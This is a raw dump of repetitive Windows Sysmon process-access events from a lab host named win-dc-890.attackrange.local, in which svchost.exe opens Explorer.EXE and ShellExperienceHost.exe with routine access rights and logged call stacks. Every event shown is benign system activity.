07:56:12.008{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050371Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:56:12.008{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050370Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:12.008{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050369Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:56:12.008{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050368Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:12.008{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050367Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:56:12.008{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050366Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:12.008{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050365Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:56:12.008{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050364Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:12.008{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050363Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:56:12.008{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050362Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:12.008{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050361Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:56:12.008{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050360Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:12.008{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050359Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:56:12.008{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050358Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:12.008{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050357Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:56:12.008{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050356Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:12.008{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050355Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:56:12.008{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050354Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:12.008{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050353Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:56:12.008{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050352Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:12.008{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050351Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:56:12.008{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050350Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:12.008{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050349Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:56:12.008{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050348Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:12.008{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050347Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:56:12.008{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050346Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:12.008{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050345Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:56:12.008{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050344Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:12.008{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050343Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:56:12.008{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050342Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:12.008{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050341Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:56:12.008{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050340Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:12.008{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050339Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 